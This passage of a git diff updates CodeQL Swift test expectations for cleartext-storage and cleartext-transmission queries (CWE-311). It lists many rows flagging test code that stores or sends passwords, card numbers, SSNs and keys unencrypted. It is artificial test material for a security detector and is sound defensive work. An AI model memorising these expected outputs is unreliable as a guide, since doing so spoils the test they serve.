It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | -| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | -| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | -| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | -| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | -| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | -| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. 
| testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | -| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | -| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | -| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | -| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | -| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | -| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | -| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | -| testGRDB.swift:95:36:95:45 | [...] 
| testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | -| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | -| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | -| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | -| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | -| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | -| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | -| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] 
| This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | -| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | -| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | -| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | -| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | -| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | -| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | -| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. 
It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | -| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | -| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | -| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | -| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | -| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | -| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | -| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:155:66:155:66 | password | password | -| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | -| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | -| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | -| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | -| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | -| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | -| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:173:57:173:57 | password | password | -| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | -| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | -| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | -| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | -| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | -| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | -| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:188:48:188:48 | password | password | -| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | -| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | -| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | -| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | -| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | -| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | -| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. 
| testGRDB.swift:210:85:210:85 | password | password | -| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | -| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | -| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | -| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | -| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | -| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | -| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. 
| testRealm2.swift:33:11:33:11 | CCN | CCN | -| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | -| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | -| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | -| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | -| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | -| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref index d73f4fc4bc29..0d588f51e615 100644 --- a/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref 
+++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextStorageDatabase.qlref
@@ -1 +1,2 @@
-queries/Security/CWE-311/CleartextStorageDatabase.ql
\ No newline at end of file
+query: queries/Security/CWE-311/CleartextStorageDatabase.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected
index 7665b72b11a6..fe43c3af8b9b 100644
--- a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected
+++ b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected
@@ -1,3 +1,35 @@ +#select +| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | +| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | +| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | +| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | +| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. | testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | +| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. 
| testSend.swift:58:13:58:13 | password | password | +| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | +| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | +| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | +| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | +| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | +| testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | testSend.swift:77:27:77:30 | .birth_day | This operation transmits '.birth_day', which may contain unencrypted sensitive data from $@. | testSend.swift:77:27:77:30 | .birth_day | .birth_day | +| testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | testSend.swift:78:27:78:30 | .CarePlanID | This operation transmits '.CarePlanID', which may contain unencrypted sensitive data from $@. 
| testSend.swift:78:27:78:30 | .CarePlanID | .CarePlanID | +| testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | testSend.swift:79:27:79:30 | .BankCardNo | This operation transmits '.BankCardNo', which may contain unencrypted sensitive data from $@. | testSend.swift:79:27:79:30 | .BankCardNo | .BankCardNo | +| testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | testSend.swift:80:27:80:30 | .MyCreditRating | This operation transmits '.MyCreditRating', which may contain unencrypted sensitive data from $@. | testSend.swift:80:27:80:30 | .MyCreditRating | .MyCreditRating | +| testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | testSend.swift:81:27:81:30 | .OneTimeCode | This operation transmits '.OneTimeCode', which may contain unencrypted sensitive data from $@. | testSend.swift:81:27:81:30 | .OneTimeCode | .OneTimeCode | +| testSend.swift:94:27:94:39 | .value | testSend.swift:94:27:94:30 | .password | testSend.swift:94:27:94:39 | .value | This operation transmits '.value', which may contain unencrypted sensitive data from $@. | testSend.swift:94:27:94:30 | .password | .password | +| testURL.swift:39:18:39:50 | ... .+(_:_:) ... | testURL.swift:39:50:39:50 | passwd | testURL.swift:39:18:39:50 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:39:50:39:50 | passwd | passwd | +| testURL.swift:41:18:41:51 | ... .+(_:_:) ... | testURL.swift:41:51:41:51 | account_no | testURL.swift:41:18:41:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:41:51:41:51 | account_no | account_no | +| testURL.swift:42:18:42:51 | ... .+(_:_:) ... | testURL.swift:42:51:42:51 | credit_card_no | testURL.swift:42:18:42:51 | ... .+(_:_:) ... | This operation transmits '... 
.+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:42:51:42:51 | credit_card_no | credit_card_no | +| testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | testURL.swift:46:22:46:22 | passwd | This operation transmits 'passwd', which may contain unencrypted sensitive data from $@. | testURL.swift:46:22:46:22 | passwd | passwd | +| testURL.swift:50:18:50:51 | ... .+(_:_:) ... | testURL.swift:50:51:50:51 | e_mail | testURL.swift:50:18:50:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:50:51:50:51 | e_mail | e_mail | +| testURL.swift:52:18:52:53 | ... .+(_:_:) ... | testURL.swift:52:53:52:53 | a_homeaddr_z | testURL.swift:52:18:52:53 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:52:53:52:53 | a_homeaddr_z | a_homeaddr_z | +| testURL.swift:54:18:54:51 | ... .+(_:_:) ... | testURL.swift:54:51:54:51 | resident_ID | testURL.swift:54:18:54:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:54:51:54:51 | resident_ID | resident_ID | +| testURL.swift:73:18:73:67 | ... .+(_:_:) ... | testURL.swift:73:52:73:67 | call to get_secret_key() | testURL.swift:73:18:73:67 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:73:52:73:67 | call to get_secret_key() | call to get_secret_key() | +| testURL.swift:75:18:75:69 | ... .+(_:_:) ... | testURL.swift:75:53:75:69 | call to get_cert_string() | testURL.swift:75:18:75:69 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testURL.swift:75:53:75:69 | call to get_cert_string() | call to get_cert_string() | +| testURL.swift:96:18:96:18 | "..." 
| testURL.swift:96:51:96:51 | certificate | testURL.swift:96:18:96:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:96:51:96:51 | certificate | certificate | +| testURL.swift:106:20:106:20 | "..." | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | testURL.swift:106:20:106:20 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:104:16:104:57 | call to SecKeyCopyExternalRepresentation(_:_:) | call to SecKeyCopyExternalRepresentation(_:_:) | +| testURL.swift:116:18:116:18 | "..." | testURL.swift:116:52:116:52 | email | testURL.swift:116:18:116:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:116:52:116:52 | email | email | +| testURL.swift:123:18:123:18 | "..." | testURL.swift:123:52:123:52 | phone_number | testURL.swift:123:18:123:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:123:52:123:52 | phone_number | phone_number | +| testURL.swift:132:18:132:18 | "..." | testURL.swift:132:39:132:39 | account_no | testURL.swift:132:18:132:18 | "..." | This operation transmits '"..."', which may contain unencrypted sensitive data from $@. | testURL.swift:132:39:132:39 | account_no | account_no | edges | file://:0:0:0:0 | self | file://:0:0:0:0 | .value | provenance | Config | | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | provenance | | 
@@ -103,35 +135,3 @@ nodes subpaths | testSend.swift:60:17:60:17 | password | testSend.swift:41:10:41:18 | data | testSend.swift:41:45:41:45 | data | testSend.swift:60:13:60:25 | call to pad(_:) | | testSend.swift:94:27:94:30 | .password | testSend.swift:86:7:86:7 | self | file://:0:0:0:0 | .value | testSend.swift:94:27:94:39 | .value | -#select -| testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | testAlamofire.swift:150:45:150:45 | password | testAlamofire.swift:150:13:150:45 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:150:45:150:45 | password | password | -| testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | testAlamofire.swift:152:51:152:51 | password | testAlamofire.swift:152:19:152:51 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:152:51:152:51 | password | password | -| testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | testAlamofire.swift:154:38:154:38 | email | testAlamofire.swift:154:14:154:46 | ... .+(_:_:) ... | This operation transmits '... .+(_:_:) ...', which may contain unencrypted sensitive data from $@. | testAlamofire.swift:154:38:154:38 | email | email | -| testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | testSend.swift:29:19:29:19 | passwordPlain | This operation transmits 'passwordPlain', which may contain unencrypted sensitive data from $@. | testSend.swift:29:19:29:19 | passwordPlain | passwordPlain | -| testSend.swift:37:19:37:19 | data2 | testSend.swift:33:19:33:19 | passwordPlain | testSend.swift:37:19:37:19 | data2 | This operation transmits 'data2', which may contain unencrypted sensitive data from $@. 
| testSend.swift:33:19:33:19 | passwordPlain | passwordPlain | -| testSend.swift:65:27:65:27 | str1 | testSend.swift:58:13:58:13 | password | testSend.swift:65:27:65:27 | str1 | This operation transmits 'str1', which may contain unencrypted sensitive data from $@. | testSend.swift:58:13:58:13 | password | password | -| testSend.swift:66:27:66:27 | str2 | testSend.swift:59:13:59:13 | password | testSend.swift:66:27:66:27 | str2 | This operation transmits 'str2', which may contain unencrypted sensitive data from $@. | testSend.swift:59:13:59:13 | password | password | -| testSend.swift:67:27:67:27 | str3 | testSend.swift:60:17:60:17 | password | testSend.swift:67:27:67:27 | str3 | This operation transmits 'str3', which may contain unencrypted sensitive data from $@. | testSend.swift:60:17:60:17 | password | password | -| testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | testSend.swift:71:27:71:27 | license_key | This operation transmits 'license_key', which may contain unencrypted sensitive data from $@. | testSend.swift:71:27:71:27 | license_key | license_key | -| testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | testSend.swift:72:27:72:30 | .mobileNumber | This operation transmits '.mobileNumber', which may contain unencrypted sensitive data from $@. | testSend.swift:72:27:72:30 | .mobileNumber | .mobileNumber | -| testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | testSend.swift:76:27:76:30 | .Telephone | This operation transmits '.Telephone', which may contain unencrypted sensitive data from $@. | testSend.swift:76:27:76:30 | .Telephone | .Telephone | 